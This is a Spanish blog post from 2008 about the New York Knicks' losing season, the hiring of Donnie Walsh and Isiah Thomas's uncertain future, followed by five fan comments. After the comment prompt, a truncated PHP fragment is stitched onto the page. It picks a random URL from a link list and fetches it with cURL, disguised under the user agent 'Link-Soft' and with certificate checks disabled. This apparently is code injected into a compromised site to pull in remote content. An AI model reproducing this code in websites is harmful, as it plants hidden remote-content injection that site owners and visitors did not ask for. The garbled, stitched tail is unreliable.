Tiempo de ¿cambios? en la Gran Manzana

03 de April de 2008 por Gallis

 Quedan 7 partidos para que la temporada 2007/08 acabe, por lo que respecta a los New York Knicks(20-55). El panorama es desolador y, aunque no deja de ser más que una de esas anécdotas que tanto gustan a los yankees, puede convertirse en un año histórico para la franquicia. En los últimos 20 partidos, los muchachos de Isiah Thomas sólo han ganado 4 partidos, los mismos que deberán ganar de aquí al final para que esta no sea la peor temporada de su historia(1985/86, 23-59). Hasta ahora los Knicks nunca han perdido 60 partidos en una temporada. Lo dicho, un simple dato, pero a la vez una muestra del proceso de descomposición en el que ha entrado una franquicia que, en el fondo, siempre ha sido un poco más ruido que nueces.

Así las cosas, James Dolan, propietario de los Knicks, ha decidido dar la enésima vuelta de tuerca y contratar a Donnie Walsh como nuevo presidente del equipo. La fama precede al hombre que durante los últimos 24 años ha dirigido el rumbo de uno de los principales rivales de los Knicks en el este, los Indiana Pacers. Ambos equipos se cruzaron 3 veces en la final del este durante la década pasada, unas sensaciones casi olvidadas en el Madison Square Garden, que no ve ganar un partido de Playoff a su equipo desde 2001, y que Donnie Walsh pretende recuperar.

El caso es que, analizando la situación, la pregunta no es si Donnie Walsh es el hombre adecuado para realizar los cambios que necesitan los Knicks. La pregunta es si en los 4 años por los que ha firmado, y por los que recibirá unos 20 millones de dólares, podrá realizar cambios significativos y cambiar el rumbo de la franquicia. Una plantilla descompensada, muy devaluada y excesivamente sobrepagada no son las mejores cartas con las que jugar, incluso contando a favor con el mercado más grande de Estados Unidos y un propietario poco preocupado por gastarse más dinero del debido.

Pero antes de comenzar el juego, la primera y principal precocupación de Walsh es el arquitecto de esta estructura tan inestable: Isiah Thomas. En diciembre de 2003, Thomas fue contratado para el cargo que ahora ocupará Walsh y su gestión es el principal aval de este cambio. La situación del Bad Boy queda ahora en el alero, ya que está en juego el puesto de entrenador que, desde este verano, compaginaba con la presidencia del equipo. Lógicamente, apenas 24 horas después no hay decisión, pero la verdad, mantenerle en el banquillo sería una decisión dificilmente entendible, por mucho que Walsh ya le confiara el banquillo de los Pacers al comienzo de la temporada 2000/01. Thomas ha declarado que está dispuesto a seguir en la franquicia en el puesto que su nuevo presidente considere oportuno, pero se antoja que lo más oportuno es que Thomas y los Knicks separen sus caminos, en busca de tiempos mejores para ambos. Si el relevo se produce, será interesante ver el nombre elegido para dirigir al equipo: Rick Carlise, Paul Silas o Scott Skiles son algunos de los nombres que suenan, aunque el que lo hace con más fuerza es Mark Jackson, un hombre muy querido en el Madison y de total confianza de Walsh. Quizá estos Knicks sean un toro demasiado bravo para un rookie de los banquillos, pero vistas las pocas expectativas que el equipo tiene para las próximas temporadas, quizá sea una buena apuesta para un proyecto a largo plazo.

Otra duda, antes de comenzar la partida es saber si Walsh ejercerá las funciones de General Manager o si, como ya hizo en su último época en Indiana con Larry Bird, contratará un GM para ayudarle. Está última parece la opción más sensata, ya que el trabajo es de aúpa. Y es que, yendo al grano, la plantilla de los Knicks tiene un presente desastroso y un futuro nada esperanzador. Los máximos exponentes de la errónea política deportiva de Thomas son Zach Randolph, Eddy Curry y Stephon Marbury. Randolph, el último JailBlazer, llegó a New York con la esperanza de que su carrera diera un giro y se convirtiera en el líder del equipo, olvidándose de los problemas con sus compañeros en Portland. No ha conseguido ni lo uno ni lo otro (llegando incluso a pegarse con un compañero durante un tiempo muerto). Este verano, cuando Kobe Bryant pidió publicamente su traspaso, Thomas declaró que estaría dispuesto a dar a toda su plantilla por él, exceptuando a Curry. Solo está declaración debería inhabilitarle, pero por si acaso, el pívot se ha encargado esta temporada de dejarle más en evidencia todavía. El caso de Marbury roza niveles esperpénticos, ya que el jugador ha llegado a ser apartado del equipo e, incluso, se le prohibió la entrada al Madison.

El caso es, ¿Qué deberían hacer los Knicks? La primera respuesta, la más obvia es: ni idea. A partir de ahí cualquier opción, idea o proyecto es muy difícil de ejecutar. Una buena primera medida sería dejar de asumir salario en cada trade realizado. Y es que el equipo está hipotecado hasta el verano de 2011. Sin duda, lo que convertiría en un éxito la gestión de Walsh sería conseguir el traspaso de Randolph o Curry, o el de ambos, pero este año ya ha sido imposible que ningún equipo asuma sus mastodónticos contratos y cuanto más tiempo pasa, menores son las posibilidades. Para ello, por supuesto, los Knicks deben olvidarse de la calidad y buscar jugadores más baratos y sobre todo, con contratos más cortos. Si no lo consigue, Walsh deberá renovar el contrato que recién acaba de firmar para poder cambiar las cosas en profundidad.

Y aún consiguiendo uno de esos traspasos, o ambos, aún queda otra decisión que tomar, una apuesta a corto o medio plazo. David Lee, Nate Robinson, Jamal Crawford o Quentin Richardson son jugadores que quizá (y hago énfasis en el quizá, sobre todo en los 2 últimos) podrían rendir mucho con el viento a favor y si Walsh confia en ellos la apuesta será a corto plazo: tratar de reforzar esta plantilla en verano o, más probablemente, en febrero, momento en el que el expiring contract de Marbury, 22 millones de dólares, entrará en juego. Viendo precedentes como el de Pau Gasol, si Walsh juega sus cartas los cambios en la Gran Manzana llegarán antes de lo que todos nos esperamos. Si la apuesta es a medio plazo, podría hablarse del proyecto 2010 (hermano pequeño del proyecto 2007 de los Lakers). Bajo la premisa del traspaso de Randolph o Curry, los Knicks se encontrarían ese verano por debajo del límite salarial por primera vez desde tiempos inmemoriales, justo en el año en el que Lebron James, Dwayne Wade o Chris Bosh saldrán al mercado. Una opción tan o más arriesgada que las demás ya que, por mucho que se hable del atractivo del equipo, la ciudad y el mercado, los Knicks no han sabido atraer a los grandes agentes libres de las últimas décadas. Quizá ahí deje su sello el nuevo presidente.

Otra opción muy comentada por algunos foros de los Knicks es la de fijarse en el espejo de los Blazers, que a base de elecciones de draft han cambiado su cara en 4 años, pero la situación, además de depender en exceso del azar tampoco es tan propicia, ya que la ronda de, precisamente, 2010, pertenece a Utah Jazz, gracias a una de las múltiples decisiones inexplicables de Thomas. En cualquier caso, aunque esto no deja de ser baloncesto ficción, precisamente lo irreales que resultan cualquiera de estas opciones es la mejor prueba de que cualquier cambio, por pequeño que sea, le va a costar a Donnie Walsh sangre, sudor y lágrimas. Aunque bueno, 20 millones de dólares bien merecen un esfuerzo.     

Comenta

5 comentarios a esta entrada

  1. Dantley dice:
    #1

    Lo lógico sería ese proyecto 2010. Antes es imposible que haga un equipo ganador. Lo difícil es que tengan tanta paciencia, pero de todas maneras sin paciencia son malos igualmente.

    Además no tiene activos. En todo caso algo Lee, pero que no deja de ser un secundario que aporta poco más que rebote, aunque si poniendo a Lee en el anzuelo se pudieran quitar salario a medio plazo, lo soltaría también. Crawford debería salir. Quentin casi también. Nate Robinson es chuponcete y no aporta al juego colectivo, si pueden sacar aunque sea alguna ronda, también lo debe hacer.

    Soltar a Zach, Curry y Marbury es una quimera. Zach Randolph sólo lo veo saliendo si hay algún equipo de arriba con un agujero en el 4 y siendo el ahora o nunca para esa franquicia. Yo de todas maneras intentaría regalarlo incluso a menos precio que Pau. Igual a Curry pero más difícil todavía. Y Marbury cuanto más lejos mejor.

    Mucho trabajo y justo cuando se la juega es en el 2010

      Citar

  2. Viva_Dirk dice:
    #2

    Es que no tienen nada sobre lo que construir, absolutamente nada. Miami tiene a Wade y Marion, Seattle a Durant, los Wolves a Jefferson, Foye y McCants, pero es que estos no tienen nada, salvo que hagan de Randolph una persona normal.

    El expiring de Marbury deberia salir solo si con el se llevan a Curry, si no pues 20 millones menos.

    Por otro lado, lo primero que tiene que hacer es normalizar la situación, largar a Thomas y poner a un entrenador que no vaya de estrella, a ver si al menos la franquicia no parece un circo.

    Y si está buscando un GM ayudante….¿donde hay que mandar el curriculum?

      Citar

  3. MagicJohnson32 dice:
    #3

    Igual lo recordáis… cuando Thomas fichó a Steve Francis alguien, no recuerdo quién pero posiblemente fuese Sam Smith, habló de una especie de plan maestro para reunir a Marbury y Kevin Garnett en los Knicks.

    Juas, juas, juas.

    Walsh y los Knicks tienen 2 problemas para reconstruir: el primero ya lo habéis dicho, y es que no tienen nada sobre lo que reconstruir. El segundo: que para hacer lo que han hecho los Blazers, se necesitan unos Knicks a los que enviar la morralla, jojo. Con un poco de suerte para ellos, Walsh echará a Thomas, alguna franquicia lo contratará y entonces los Knicks podrán mandarle para allá a Zach y compañía.

    Es que hay que ser burro para juntar en un equipo a Marbury & Francis y a Zach & Curry. Pero muy burro.

      Citar

  4. TheDeerHunter dice:
    #4

    Lo de largar a Thomas debería ser por ley… y ya de paso hacer una para que no pueda hacer cagadas de estas características nunca mais.
    Después, la situación, como bien decís está bastante chunga… pero peor ya es difícil que lo puedan hacer (bueno sí, pero se deberían esforzar mucho) Pensar en hacer un equipo ganador inmediatamente es absolutamente una quimera pero uno piensa que debe de existir alguien en el mundo que pueda hacer rendir la plantilla que tienen los nicks por lo menos hasta un cierto punto mientras se puedan ir librando paulatinamente de los más parásitos.

      Citar

  5. txusma dice:
    #5

    Y no nos olvidemos de los 5 kilos que cobra Jerome James o los 7 de Malik Rose. Isiah Thomas ha fichado fatal y luego no ha sabido gestionar lo que ha fichado por lo que deberia ser despedido inmediatamente. Si Stern sabe lo q se hace deberia multar a toda franquicia q le contrarara en el futuro. Por el bien de la imagen de la NBA, vamos…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>